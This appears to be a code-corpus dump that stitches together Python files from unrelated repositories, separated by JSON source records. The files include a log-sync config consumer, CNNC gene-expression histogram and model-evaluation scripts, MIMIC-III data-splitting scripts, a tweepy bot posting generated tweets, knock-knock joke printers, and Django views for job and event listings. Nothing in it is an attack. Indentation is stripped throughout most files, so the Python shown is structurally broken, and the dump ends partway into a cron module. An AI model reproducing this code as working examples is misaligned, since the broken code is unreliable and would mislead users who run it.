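A minimal sketch of the Config lifecycle described in the class docstring above: create_config() reads and validates a YAML file (filling schema defaults), set_config() may then be called exactly once, and the class-method getters drill into the stored dict. The config path below is a hypothetical placeholder.
```python
from duologsync.config import Config

# create_config() returns None (and initiates shutdown) if reading or validation fails.
config = Config.create_config('/path/to/config.yml')   # hypothetical path
if config is not None:
    Config.set_config(config)               # allowed exactly once
    print(Config.get_log_format())          # e.g. 'JSON' (schema default)
    print(Config.get_checkpoint_dir())      # e.g. '/tmp' (schema default)
```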
#### File: duologsync/consumer/trustmonitor_consumer.py
```python
from duologsync.config import Config
from duologsync.consumer.consumer import Consumer
class TrustMonitorConsumer(Consumer):
"""
An implementation of the Consumer class for trust monitor logs
"""
def __init__(self, log_format, log_queue, writer, child_account_id=None):
super().__init__(log_format, log_queue, writer, child_account_id=child_account_id)
self.log_type = Config.TRUST_MONITOR
``` |
{
"source": "jjfeng/CNNC",
"score": 2
} |
#### File: jjfeng/CNNC/evaluate_easiernet_folds.py
```python
import argparse
import sys
import json
import pickle
import logging
import numpy as np
import pandas as pd
import torch
from spinn2.evaluate_siernet_folds import eval_fold_models
from spinn2.network import SierNet, VGGSierNet
from train_with_labels_wholedatax_easiernet import load_data_TF2
def parse_args(args):
""" parse command line arguments """
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
"--seed",
type=int,
help="Random number generator seed for replicability",
default=12,
)
parser.add_argument("--model-path", type=str, default="_output/nn.pt")
parser.add_argument(
"--is-vgg", action="store_true",
)
parser.add_argument("--fold-idxs-file", type=str, default=None)
parser.add_argument(
"--data-path", type=str
)
parser.add_argument(
"--num-tf", type=int, default=2
)
parser.add_argument(
"--exclude-tf", type=int, default=1
)
parser.add_argument(
"--do-binary", action="store_true", default=False, help="fit binary outcome"
)
parser.add_argument("--out-file", type=str, default="_output/eval.json")
parser.add_argument("--log-file", type=str, default="_output/eval_nn.txt")
parser.set_defaults()
args = parser.parse_args()
return args
def load_easier_nets(model_file, is_vgg):
meta_state_dict = torch.load(model_file)
all_models = []
for fold_dicts in meta_state_dict["state_dicts"]:
init_models = []
for fold_state_dict in fold_dicts:
if is_vgg:
model = VGGSierNet(
n_inputs=(meta_state_dict["n_inputs"],meta_state_dict["n_inputs"]),
n_out=meta_state_dict["n_out"],
input_filter_layer=meta_state_dict["input_filter_layer"],
)
else:
model = SierNet(
n_layers=meta_state_dict["n_layers"],
n_input=meta_state_dict["n_inputs"],
n_hidden=meta_state_dict["n_hidden"],
n_out=meta_state_dict["n_out"],
input_filter_layer=meta_state_dict["input_filter_layer"],
)
model.load_state_dict(fold_state_dict)
init_models.append(model)
model.get_net_struct()
all_models.append(init_models)
return all_models, meta_state_dict
def main(args=sys.argv[1:]):
args = parse_args(args)
print(args)
logging.basicConfig(
format="%(message)s", filename=args.log_file, level=logging.DEBUG
)
logging.info(str(args))
np.random.seed(args.seed)
#####
# Load data
#####
x_trains = []
y_trains = []
whole_data_TF = [i for i in range(args.num_tf) if i != args.exclude_tf]
for tf_idx in whole_data_TF:
x_train, y_train, _ = load_data_TF2([tf_idx],args.data_path,binary_outcome=args.do_binary,flatten=not args.is_vgg)
x_trains.append(x_train)
y_trains.append(y_train)
if args.is_vgg:
x_trains = [x.reshape((x.shape[0], 1, x.shape[1], x.shape[2])) for x in x_trains]
# Load folds
with open(args.fold_idxs_file, "rb") as f:
fold_idx_dicts = pickle.load(f)
num_folds = len(fold_idx_dicts)
# Load models and evaluate them on folds, take the average
all_models, meta_state_dict = load_easier_nets(args.model_path, args.is_vgg)
all_losses = []
for fold_idx, fold_dict in enumerate(fold_idx_dicts):
test_x = np.concatenate([x_trains[i] for i in fold_dict["test"]], axis=0)
test_y = np.concatenate([y_trains[i] for i in fold_dict["test"]], axis=0).reshape((-1,1))
fold_models = [seed_fold_models[fold_idx] for seed_fold_models in all_models]
empirical_loss = eval_fold_models(test_x, test_y, fold_models)
all_losses.append(empirical_loss)
avg_loss = np.mean(all_losses)
# Store the ensemble results
meta_state_dict.pop("state_dicts", None)
meta_state_dict.pop("weight", None)
meta_state_dict["cv_loss"] = float(avg_loss)
meta_state_dict["seed_losses"] = list(map(float, all_losses))
print(meta_state_dict)
json.dump(meta_state_dict, open(args.out_file, "w"))
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: jjfeng/CNNC/get_xy_label_data_cnn_combine_from_database.py
```python
import pandas as pd
from numpy import *
import json, re,os, sys
save_dir_name = sys.argv[8]
save_dir = os.path.join(os.getcwd(),save_dir_name)
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
def get_gene_list_bulk(file_name):
import re
h={}
s = open(file_name,'r') #gene symbol ID list of bulk RNA-seq
for line in s:
search_result = re.search(r'^([^\s]+)\s+([^\s]+)',line)
h[search_result.group(1).lower()]=search_result.group(2) # h [gene symbol] = gene ID
s.close()
return h
def get_gene_list(file_name):
import re
h={}
s = open(file_name,'r') #gene symbol ID list of sc RNA-seq
for line in s:
search_result = re.search(r'^([^\s]+)\s+([^\s]+)',line)
h[search_result.group(1).lower()]=search_result.group(2) # h [gene symbol] = gene ID
s.close()
return h
def get_sepration_index (file_name):
import numpy as np
index_list = []
s = open(file_name, 'r')
for line in s:
index_list.append(int(line))
return (np.array(index_list))
# Script starts from here
if len(sys.argv) < 9:
    print ('Not enough input files')
sys.exit()
if not sys.argv[1] == 'None':
h_gene_list_bulk =get_gene_list_bulk(sys.argv[1]) #'bulk_gene_list.txt')#
print ('read bulk gene list')
elif sys.argv[5] == 'None': ### bulk list = none
print ('No bulk gene list')
else :
print('wrong bulk expression information')
sys.exit()
if not sys.argv[2] == 'None':
h_gene_list =get_gene_list(sys.argv[2]) # 'sc_gene_list.txt')#
print ('read sc gene list')
elif sys.argv[6] == 'None': ### sc list = none
print('No sc gene list')
else:
print('wrong sc expression information')
sys.exit()
if not sys.argv[5] == 'None':
store = pd.HDFStore(sys.argv[5])#'/home/yey3/sc_process_1/new_bulk_mouse/prs_calculation/mouse_bulk.h5') ### bulk RNA-seq expression data )#
rpkm_bulk = store['rpkm']
store.close()
print('read bulk RNA-seq expression')
elif sys.argv[1] == 'None': ### sc list = none
print('No bulk gene expression')
else:
print('wrong bulk expression information')
sys.exit()
if not sys.argv[6] == 'None':
store = pd.HDFStore(sys.argv[6])#'/home/yey3/sc_process_1/rank_total_gene_rpkm.h5') # scRNA-seq expression data )#
print("SDFSDF")
print(store)
print(list(store.keys()))
#rpkm = store['rpkm']
rpkm = store['/RPKMs']
store.close()
print('read sc RNA-seq expression')
elif sys.argv[2] == 'None': ### sc list = none
print('No sc gene expression ')
else:
print('wrong sc expression information')
sys.exit()
if sys.argv[1] == 'None' and sys.argv[2] == 'None':
print ('no bulk or sc data')
sys.exit()
if sys.argv[5] == 'None' and sys.argv[6] == 'None':
print ('no bulk or sc data')
sys.exit()
########## generate NEPDF matrix
gene_pair_label = []
s=open(sys.argv[3])#'mmukegg_new_new_unique_rand_labelx.txt')#) ### read the gene pair and label file
for line in s:
gene_pair_label.append(line)
gene_pair_index = get_sepration_index(sys.argv[4])#'mmukegg_new_new_unique_rand_labelx_num.npy')#sys.argv[6]) # read file speration index
s.close()
gene_pair_label_array = array(gene_pair_label)
for i in range(len(gene_pair_index)-1): #### many separations
print (i)
start_index = gene_pair_index[i]
end_index = gene_pair_index[i+1]
x = []
y = []
z = []
    for gene_pair in gene_pair_label_array[start_index:end_index]: ## each separation
separation = gene_pair.split()
if sys.argv[7] == '1':
x_gene_name,y_gene_name,label = separation[0],separation[1],separation[2]
y.append(label)
else:
x_gene_name, y_gene_name = separation[0], separation[1]
z.append(x_gene_name+'\t'+y_gene_name)
if not sys.argv[1] == 'None':
x_tf_bulk = log10(rpkm_bulk[h_gene_list_bulk[x_gene_name]][0:249] + 10 ** -2) ## 249 means the number of samples, users can just remove '[0:249]'
x_gene_bulk = log10(rpkm_bulk[h_gene_list_bulk[y_gene_name]][0:249] + 10 ** -2)
H_T_bulk = histogram2d(x_tf_bulk, x_gene_bulk, bins=32)
H_bulk= H_T_bulk[0].T
HT_bulk = (log10(H_bulk / 43261 + 10 ** -4) + 4)/4
if not sys.argv[2] == 'None':
x_tf = log10(rpkm[int(h_gene_list[x_gene_name])][0:43261] + 10 ** -2) # ## 43261 means the number of samples in the sc data, we also have one row that is sum of all cells, so the real size is 43262, that is why we use [0:43261]. For TF target prediction or other data, just remove "[0:43261]"
x_gene = log10(rpkm[int(h_gene_list[y_gene_name])][0:43261] + 10 ** -2)# For TF target prediction, remove "[0:43261]"
H_T = histogram2d(x_tf, x_gene, bins=32)
H = H_T[0].T
HT = (log10(H / 43261 + 10 ** -4) + 4) / 4
if sys.argv[1] == 'None': ## bulk is none, only sc
x.append(HT)
elif sys.argv[2] == 'None': ## sc is none, only bulk
x.append(HT_bulk)
else:
x.append(concatenate((HT, HT_bulk), axis=0))
if (len(x)>0):
xx = array(x)[:, :, :, newaxis]
else:
xx = array(x)
save(save_dir+'/Nxdata_tf' + str(i) + '.npy', xx)
if sys.argv[7] == '1':
save(save_dir+'/ydata_tf' + str(i) + '.npy', array(y))
save(save_dir+'/zdata_tf' + str(i) + '.npy', array(z))
``` |
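The core of the script above is the NEPDF construction: for each gene pair it builds a 32x32 joint histogram of log-transformed expression values and rescales it roughly into [0, 1]. Below is a standalone sketch of that transform; the sample count and pseudo-counts mirror the constants in the script, while the expression vectors are synthetic stand-ins.
```python
import numpy as np

def nepdf_matrix(expr_a, expr_b, n_samples, bins=32):
    # log-transform each gene's expression with a small pseudo-count
    x = np.log10(expr_a + 10 ** -2)
    y = np.log10(expr_b + 10 ** -2)
    H, _, _ = np.histogram2d(x, y, bins=bins)        # joint histogram of the pair
    H = H.T                                          # same orientation as the script
    return (np.log10(H / n_samples + 10 ** -4) + 4) / 4

rng = np.random.default_rng(0)
demo = nepdf_matrix(rng.gamma(2.0, 1.0, 5000), rng.gamma(2.0, 1.0, 5000), n_samples=5000)
print(demo.shape)   # (32, 32)
```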
{
"source": "jjfeng/mimic3_benchmarks",
"score": 3
} |
#### File: mimic3benchmark/scripts/create_in_hospital_mortality.py
```python
import sys
import os
import argparse
import pandas as pd
import random
import numpy as np
def parse_args(args):
parser = argparse.ArgumentParser(description="Create data for in-hospital mortality prediction task.")
parser.add_argument(
'root_path',
type=str,
help="Path to root folder containing train and test sets.")
parser.add_argument(
'--output-path',
type=str,
default="../../data/mimic/in-hospital-mortality/",
help="Directory where the created data should be stored.")
parser.add_argument(
'--seed',
type=int,
default=100,
help="random seed")
parser.add_argument(
'--train-csv',
type=str,
default="../../data/mimic/train_ids.csv",
help="csv file with input train ids")
parser.add_argument(
'--test-csv',
type=str,
default="../../data/mimic/test_ids.csv",
help="csv file with input test ids")
args, _ = parser.parse_known_args()
assert args.output_path != args.root_path
args.patient_id_csvs = {
"train": args.train_csv,
"test": args.test_csv}
return args
def process_partition(args, partition, eps=1e-6, n_hours=48):
patient_id_csv = args.patient_id_csvs[partition]
patients = np.array(np.genfromtxt(patient_id_csv, delimiter=","), dtype=int)
print(partition, "patient ids", patients)
output_dir = os.path.join(args.output_path, partition)
if not os.path.exists(output_dir):
os.mkdir(output_dir)
list_file_data = []
for (patient_index, patient) in enumerate(patients):
patient = str(patient)
patient_folder = os.path.join(args.root_path, patient)
patient_ts_files = list(filter(lambda x: x.find("timeseries") != -1, os.listdir(patient_folder)))
for ts_filename in patient_ts_files:
with open(os.path.join(patient_folder, ts_filename)) as tsfile:
lb_filename = ts_filename.replace("_timeseries", "")
label_df = pd.read_csv(os.path.join(patient_folder, lb_filename))
                # empty label file
                if label_df.shape[0] == 0:
                    continue
                first_row_label = label_df.iloc[0]
mortality = int(first_row_label["Mortality"])
los = 24.0 * first_row_label['Length of Stay'] # in hours
if pd.isnull(los):
print("\n\t(length of stay is missing)", patient, ts_filename)
continue
if los < n_hours - eps:
continue
ts_lines = tsfile.readlines()
header = ts_lines[0]
ts_lines = ts_lines[1:]
event_times = [float(line.split(',')[0]) for line in ts_lines]
ts_lines = [line for (line, t) in zip(ts_lines, event_times)
if -eps < t < n_hours + eps]
# no measurements in ICU
if len(ts_lines) == 0:
print("\n\t(no events in ICU) ", patient, ts_filename)
continue
output_ts_filename = patient + "_" + ts_filename
with open(os.path.join(output_dir, output_ts_filename), "w") as outfile:
outfile.write(header)
for line in ts_lines:
outfile.write(line)
output_lb_filename = patient + "_" + lb_filename
with open(os.path.join(output_dir, output_lb_filename), "w") as outfile:
outfile.write("Age,Gender,Ethnicity\n")
outfile.write("%f,%d,%d" % (first_row_label["Age"], first_row_label["Gender"], first_row_label["Ethnicity"]))
list_file_data.append((patient, output_ts_filename, output_lb_filename, n_hours, mortality))
if (patient_index + 1) % 100 == 0:
print("processed {} / {} patients".format(patient_index + 1, len(patients)), end='\r')
print("\n", len(list_file_data))
list_file_data = sorted(list_file_data)
with open(os.path.join(output_dir, "listfile.csv"), "w") as listfile:
listfile.write('patient,stay,meta,period_length,y_true\n')
for list_file_entry in list_file_data:
listfile.write('%s,%s,%s,%d,%d\n' % list_file_entry)
def main(args=sys.argv[1:]):
args = parse_args(args)
np.random.seed(args.seed)
if not os.path.exists(args.output_path):
os.makedirs(args.output_path)
process_partition(args, "train")
process_partition(args, "test")
if __name__ == '__main__':
main()
```
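The per-stay filter in process_partition() keeps only stays with a known length of stay of at least 48 hours and then truncates the event stream to events whose chart time falls within the first 48 hours (with a small epsilon at the boundaries). A small sketch of just that windowing step, isolated from the file I/O; the sample events are made up.
```python
# Each entry is (hours_since_admission, csv_line); 48 and 1e-6 mirror the
# n_hours / eps defaults of process_partition().
def clip_to_window(events, n_hours=48, eps=1e-6):
    return [line for (t, line) in events if -eps < t < n_hours + eps]

events = [(0.5, "0.5,HR,80"), (47.9, "47.9,HR,92"), (49.0, "49.0,HR,88")]
print(clip_to_window(events))   # the 49-hour event is dropped
```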
#### File: mimic3benchmark/scripts/split_train_and_test.py
```python
import sys
import os
import shutil
import argparse
import numpy as np
def parse_args(args):
parser = argparse.ArgumentParser(description='Split data into train and test sets.')
parser.add_argument('subjects_root_path', type=str, help='Directory containing subject sub-directories.')
parser.add_argument('--seed', type=int, default=100, help='random seed')
    parser.add_argument('--test-proportion', type=float, default=0.25, help='proportion of patients placed in the test set')
parser.add_argument(
'--train-csv',
type=str,
default="../../data/mimic/train_ids.csv")
parser.add_argument(
'--test-csv',
type=str,
default="../../data/mimic/test_ids.csv")
args, _ = parser.parse_known_args(args)
return args
def main(args=sys.argv[1:]):
args = parse_args(args)
np.random.seed(args.seed)
folders = os.listdir(args.subjects_root_path)
patient_ids = list(filter(str.isdigit, folders))
num_test = int(args.test_proportion * len(patient_ids))
shuffled_patient_ids = np.random.permutation(patient_ids)
train_patients = np.array(shuffled_patient_ids[:-num_test], dtype=int).reshape((-1,1))
test_patients = np.array(shuffled_patient_ids[-num_test:], dtype=int).reshape((-1,1))
print(test_patients)
np.savetxt(args.train_csv, train_patients, fmt='%d', delimiter=",")
np.savetxt(args.test_csv, test_patients, fmt='%d', delimiter=",")
if __name__ == '__main__':
main()
``` |
{
"source": "jjfeore/turingtweets",
"score": 3
} |
#### File: turingtweets/scripts/tweet_fake_tweet.py
```python
import os
import tweepy
from sqlalchemy import (
Column,
Unicode,
Integer,
Boolean,
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.schema import MetaData
from sqlalchemy import engine_from_config
from sqlalchemy.orm import sessionmaker
NAMING_CONVENTION = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(constraint_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
metadata = MetaData(naming_convention=NAMING_CONVENTION)
Base = declarative_base(metadata=metadata)
class Tweet(Base):
"""Model for a single tweet."""
__tablename__ = 'tweets'
id = Column(Integer, primary_key=True)
tweet = Column(Unicode)
class FakeTweet(Base):
"""Model for a single fake tweet."""
__tablename__ = 'fake-tweets'
id = Column(Integer, primary_key=True)
faketweet = Column(Unicode)
tweeted = Column(Boolean)
shown = Column(Integer)
chosen = Column(Integer)
def get_engine(settings, prefix='sqlalchemy.'): # pragma: no cover
return engine_from_config(settings, prefix)
def get_fake_tweet():
test_dict = {'sqlalchemy.url': os.environ.get('DATABASE_URL')}
engine = get_engine(test_dict)
SessionFactory = sessionmaker(bind=engine)
session = SessionFactory()
if session.query(FakeTweet).filter_by(tweeted=False).first():
fake_tweet = session.query(FakeTweet).filter_by(tweeted=False).first().faketweet
session.query(FakeTweet).filter(FakeTweet.faketweet == fake_tweet).update({'tweeted':True})
session.commit()
tweet_fake_tweet(fake_tweet)
def tweet_fake_tweet(tweet): # pragma: no cover
auth = tweepy.OAuthHandler(os.environ.get('CONSUMER_KEY'), os.environ.get('CONSUMER_SECRET'))
auth.set_access_token(os.environ.get('ACCESS_TOKEN'), os.environ.get('ACCESS_TOKEN_SECRET'))
api = tweepy.API(auth)
api.update_status(status=tweet)
if __name__ == "__main__": # pragma: no cover
print('running tweet_fake_tweet...')
get_fake_tweet()
``` |
{
"source": "jjfiv/ltr2net",
"score": 3
} |
#### File: ltr2net/forest2gen/forest2gen.py
```python
import xml.etree.ElementTree as ET
import gzip
from collections import defaultdict
import numpy as np
class EvalNode(object):
def __init__(self, fid, value):
self.yes = None
self.no = None
self.weight = 1.0
self.fid = fid
self.value = value
def eval(self, arr):
if arr[self.fid] <= self.value:
return self.weight * self.yes.eval(arr)
else:
return self.weight * self.no.eval(arr)
def visit(self, fn):
fn(self)
self.yes.visit(fn)
self.no.visit(fn)
class EvalLeaf(object):
def __init__(self, response):
self.response = response
self.weight = 1.0
def eval(self, arr):
return self.weight * self.response
def visit(self, fn):
fn(self)
class EvalEnsemble(object):
def __init__(self, trees):
self.trees = trees
self.weight = 1.0
def eval(self, arr):
return self.weight * sum([t.eval(arr) for t in self.trees])
def visit(self, fn):
fn(self)
for t in self.trees:
t.visit(fn)
def find_splits(self):
splits = []
def include(node, splits):
if type(node) == EvalNode:
splits.append(node)
self.visit(lambda n: include(n, splits))
return splits
def find_split_points_by_fid(self):
split_points = defaultdict(list)
# include all observed points
for split in self.find_splits():
split_points[split.fid].append(split.value)
return dict((fid, set(ps)) for fid, ps in split_points.items())
def split_points_to_generator(ensemble, fstats):
split_points = ensemble.find_split_points_by_fid()
generator_data = {}
for fid, point_set in split_points.items():
mid_points = [fstats[fid]['min'],
fstats[fid]['max'], fstats[fid]['mean']]
point_list = sorted(point_set)
for i in range(len(point_list)-1):
mid_points.append((point_list[i] + point_list[i+1])/2)
generator_data[fid] = mid_points
for fid, info in fstats.items():
if fid not in generator_data:
generator_data[fid] = list(
set([info['min'], info['mean'], info['max']]))
num_features = len(generator_data) + 1
print('num_features {0}'.format(num_features))
def generate_batch(n):
y = np.zeros(n)
X = np.zeros((n, num_features))
for fid in generator_data.keys():
X[:, fid] = np.random.choice(
generator_data[fid], size=n, replace=True)
for i in range(n):
y[i] = ensemble.eval(X[i, :])
return X, y
return generate_batch
def _parse_split(split):
output = split.find('output')
# if there's an <output> tag, we're at a leaf:
if output is not None:
return EvalLeaf(float(output.text))
# otherwise, split based on this feature.
fid = int(split.findtext('feature'))
cond = float(split.findtext('threshold'))
current = EvalNode(fid, cond)
# recursively translate the whole tree.
for child in split.findall('split'):
pos = child.get('pos')
recurse = _parse_split(child)
if pos == 'left':
current.yes = recurse
else:
current.no = recurse
return current
def load_ranklib_model_reader(reader):
comments = []
model = []
for line in reader:
if line.startswith('##'):
comments.append(line)
continue
else:
model.append(line)
ensemble = ET.fromstring('\n'.join(model))
keep = []
for tree in ensemble.findall('tree'):
root_split_node = tree.find('split')
root = _parse_split(root_split_node)
root.weight = float(root_split_node.get("weight", default="1.0"))
keep.append(root)
return EvalEnsemble(keep)
def smart_reader(path):
if path.endswith('.gz'):
return gzip.open(path, 'rt')
return open(path, 'r')
def load_ranklib_model(path):
with smart_reader(path) as fp:
return load_ranklib_model_reader(fp)
ensemble = None
if __name__ == '__main__':
ensemble = load_ranklib_model(
'tree_parsing/mq07.lambdaMart.l10.kcv10.tvs90.gz')
``` |
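Putting the pieces above together: load a RankLib ensemble, build per-feature min/mean/max statistics, and use split_points_to_generator() to sample labelled batches whose targets are the ensemble's own scores. The model path reuses the one from the __main__ block; the feature statistics below are placeholder assumptions (in practice they would come from real training data), and RankLib feature ids are assumed to be 1-based and consecutive.
```python
ensemble = load_ranklib_model('tree_parsing/mq07.lambdaMart.l10.kcv10.tvs90.gz')

# fstats must cover every feature id used by the model; placeholder stats here.
max_fid = max(ensemble.find_split_points_by_fid())
fstats = {fid: {'min': 0.0, 'mean': 0.5, 'max': 1.0} for fid in range(1, max_fid + 1)}

generate_batch = split_points_to_generator(ensemble, fstats)
X, y = generate_batch(128)   # X: sampled feature rows, y: ensemble scores
print(X.shape, y.shape)
```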
{
"source": "jjfiv/mm2020",
"score": 3
} |
#### File: jjfiv/mm2020/crosenberg16.py
```python
def print_in_block(message):
"""
print_in_block prints a message fancy
"""
print("="*4, message)
print("This is going to cause a problem")
print_in_block("knock knock!")
print_in_block("who's there?")
print_in_block("owls go")
print_in_block("owls go who?")
print_in_block("exactly!")
print("dsdp is the best") # everyone is the best
```
#### File: jjfiv/mm2020/dave.py
```python
def print_in_block(message):
"""
print_in_block prints a message fancy
"""
print("="*4, message)
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("hatch")
print_in_block("\thatch who?")
print_in_block("bless you!")
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("ether")
print_in_block("\tether who?")
print_in_block("ether bunny here!")
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("Stella")
print_in_block("\tStella who?")
print_in_block("Stellanother ether bunny here!")
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("cargo")
print_in_block("\tcargo who?")
print_in_block("Cargo beep beep and run over all the ether bunnies!")
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("owls go")
print_in_block("\towls go who?")
print_in_block("exactly!")
```
#### File: jjfiv/mm2020/mbrody22.py
```python
def print_in_block(message):
"""
print_in_block prints a message fancy
"""
print("="*4, message)
print('\n')
print_in_block("knock knock!")
print_in_block("\twho's there?")
print_in_block("interrupting cow")
print_in_block("\tinterrupti-")
print_in_block("MOO!")
print('\n')
``` |
{
"source": "jjfleet/Capstone",
"score": 2
} |
#### File: Projects/events/views.py
```python
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from .models import EventListing
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from events.forms import EventCreateView, EventUpdateForm
from django.contrib import messages
from django.urls import reverse
@login_required
def eventCreate(request):
if request.method == 'POST':
form = EventCreateView(request.POST, request.FILES)
if form.is_valid():
form.instance.author = request.user
form = form.save()
messages.success(request, "Your event has been created!")
return redirect(reverse('event-detail', kwargs={'pk': form.pk}))
else:
form = EventCreateView()
return render(request, 'events/eventlisting_form.html', {'form': form})
def eventUpdateView(request, pk):
instance = get_object_or_404(EventListing, id=pk)
form = EventUpdateForm(request.POST or None, instance=instance)
if form.is_valid():
form.save()
messages.success(request, "Your event has been updated!")
return redirect(reverse('event-detail', kwargs={'pk': pk}))
else:
e_form = EventUpdateForm(instance = EventListing.objects.get(pk=pk))
return render(request, 'events/eventupdate_form.html', {'e_form': e_form})
class EventPageView(ListView):
model = EventListing
template_name = 'events/events.html'
context_object_name = 'data'
ordering = ['-date_posted']
class UserEventPageView(ListView):
model = EventListing
template_name = 'events/user_event.html'
context_object_name = 'data'
paginate_by = 3
def get_queryset(self):
user = get_object_or_404(User, username=self.kwargs.get('username'))
return EventListing.objects.filter(author=user).order_by('-date_posted')
class EventUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = EventListing
    fields = []  # model fields go here
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
def test_func(self):
event = self.get_object()
        return self.request.user == event.author  # only the author may update the event
class EventDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = EventListing
success_url = '/'
def test_func(self):
event = self.get_object()
return self.request.user == event.author
class EventDetailView(DetailView):
model = EventListing
```
#### File: Projects/jobs/views.py
```python
from django.shortcuts import render, reverse, get_object_or_404, redirect
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from .models import JobListing
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from django.utils import timezone
from django.db.models import Q
from django.contrib import messages
import datetime
from jobs.forms import JobCreateForm, JobUpdateForm
def job_create(request):
if request.method == 'POST':
form = JobCreateForm(request.POST)
if form.is_valid():
form.instance.author = request.user
form = form.save()
messages.success(request, "Your job has been created!")
return redirect(reverse('job-detail', kwargs={'pk': form.pk}))
else:
form = JobCreateForm(initial={
'phone_Number': request.user.profile.phone_Number,
'company': request.user.profile.company
}
)
return render(request, 'jobs/joblisting_form.html', {'form': form})
def jobUpdateView(request, pk):
instance = get_object_or_404(JobListing, id=pk)
form = JobUpdateForm(request.POST or None, instance=instance)
if form.is_valid():
form.save()
messages.success(request, "Your job has been created!")
return redirect(reverse('job-detail', kwargs={'pk': pk}))
else:
g_form = JobUpdateForm(instance = JobListing.objects.get(pk=pk))
return render(request, 'jobs/jobupdate_form.html', {'g_form': g_form})
class JobPageView(ListView):
model = JobListing
template_name = 'jobs/jobs.html'
context_object_name = 'data'
ordering = ['-date_posted']
class UserJobPageView(ListView):
model = JobListing
template_name = 'jobs/user_jobs.html'
context_object_name = 'data'
paginate_by = 3
def get_queryset(self):
user = get_object_or_404(User, username=self.kwargs.get('username'))
return JobListing.objects.filter(author=user).order_by('-date_posted')
class JobDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = JobListing
success_url = '/'
def test_func(self):
job = self.get_object()
return self.request.user == job.author
class JobDetailView(DetailView):
model = JobListing
# class JobSearchView(ListView):
# model = JobListing
# template_name = 'jobs/jobs.html'
# context_object_name = 'data'
# ordering = ['-date_posted']
#
# def get_queryset
```
#### File: Projects/sites/views.py
```python
from django.shortcuts import render, get_object_or_404
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from jobs.models import JobListing
from companies.models import CompanyListing
from consultants.models import ConsultantListing
from groups.models import GroupListing
from events.models import EventListing
from django.db.models import Value, CharField, Q
from django.contrib.postgres.search import SearchQuery
from django.template.loader import get_template, render_to_string
from django.shortcuts import render, get_object_or_404, redirect
from django.conf import settings
from django.contrib import messages
from django.core.mail import send_mail, EmailMultiAlternatives, EmailMessage
from .models import ContactUs
from .forms import ContactUsForm
def contactUs(request):
c_form = ContactUsForm(request.POST or None)
if c_form.is_valid():
instance = c_form.save()
contact = ContactUs.objects.get(id=instance.id)
subject = instance.subject
mail = EmailMultiAlternatives(to=[settings.EMAIL_HOST_USER], subject=subject)
mail.attach_alternative(render_to_string("sites/contact_message.html", {'all_items_feed': contact}), "text/html")
mail.send()
messages.success(request, 'The message has been sent, thanks!', 'alert alert-success alert-dismissable')
return redirect('sites-home')
context = {
"c_form": c_form,
}
template = 'sites/contact.html'
    return render(request, template, context)
def home(request):
jobs = JobListing.objects.all().order_by('-date_posted').annotate(type=Value('job', CharField()))
companies = CompanyListing.objects.all().order_by('-date_posted').annotate(type=Value('company', CharField()))
events = EventListing.objects.all().order_by('-date_posted').annotate(type=Value('event', CharField()))
groups = GroupListing.objects.all().order_by('-date_posted').annotate(type=Value('group', CharField()))
consultants = ConsultantListing.objects.all().order_by('-date_posted').annotate(type=Value('consultant', CharField()))
results = list(jobs) + list(events) + list(companies) + list(groups) + list(consultants)
results = sorted(results, key=lambda obj: obj.date_posted, reverse=True)
return render(request, 'sites/index.html', {'all_items_feed': results})
def search(request):
template = 'sites/search.html'
queryitem = request.GET.get('q')
queryset = queryitem.split(' ')
results = []
for query in queryset:
jobs = JobListing.objects.filter(Q(title__icontains=query) | Q(summary__icontains=query)).annotate(type=Value('job', CharField()))
events = EventListing.objects.filter(Q(event_Name__icontains=query) | Q(event_Description__icontains=query)).annotate(type=Value('event', CharField()))
companies = CompanyListing.objects.filter(Q(company_Name__icontains=query) | Q(description__icontains=query)).annotate(type=Value('company', CharField()))
groups = GroupListing.objects.filter(Q(group_Name__icontains=query) | Q(description__icontains=query)).annotate(type=Value('group', CharField()))
consultants = ConsultantListing.objects.filter(Q(consultant_Name__icontains=query) | Q(description__icontains=query)).annotate(type=Value('consultant', CharField()))
results.extend(list(jobs) + list(events) + list(companies) + list(groups) + list(consultants))
results = sorted(results, key=lambda obj: obj.date_posted, reverse=True)
results = list(set(results))
    context = {'data': results, 'item': queryitem, 'len': len(results)}
return render(request, template, context)
class AboutPageView(TemplateView):
template_name = "sites/about.html"
class ContactPageView(TemplateView):
template_name = "sites/contact.html"
class TermsAndCondition(TemplateView):
template_name = "sites/termsandconditions.html"
# class IndexView(ListView):
# template_name = 'sites/index.html'
# model = JobListing
# context_object_name = 'data'
# def get_context_data(self, **kwargs):
# context = super(IndexView, self).get_context_data(**kwargs)
# context.update({
# 'character_universe_list': JobListing.objects.order_by('-date_posted'),
# 'more_context': CompanyListing.objects.order_by('-date_posted'),
# })
# return context
#
# def get_queryset(self):
# return JobListing.objects.order_by('-date_posted')
```
#### File: Projects/techpalmyapp/auto_task.py
```python
from django_cron import CronJobBase, Schedule
from jobs.models import JobListing
